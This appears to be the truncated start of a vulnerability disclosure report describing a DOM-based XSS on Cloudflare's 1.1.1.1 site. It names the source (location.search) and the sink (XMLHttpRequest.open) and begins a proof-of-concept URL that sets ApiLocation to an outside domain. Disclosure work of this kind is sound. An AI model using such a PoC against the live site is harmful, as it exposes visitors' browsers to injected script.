Cloudflare: DOM XSS on 1.1.1.1(one.one.one.one)
After discussion with Cloudflare on twitter I'm reporting this here. There is a DOM XSS on 1.1.1.1 or one.one.one.one site, it seems like the sink is XMLHR.open,Taint,,, and the source is location.search The PoC url's are: https://1.1.1.1/?ApiLocation=//localdomain.pw...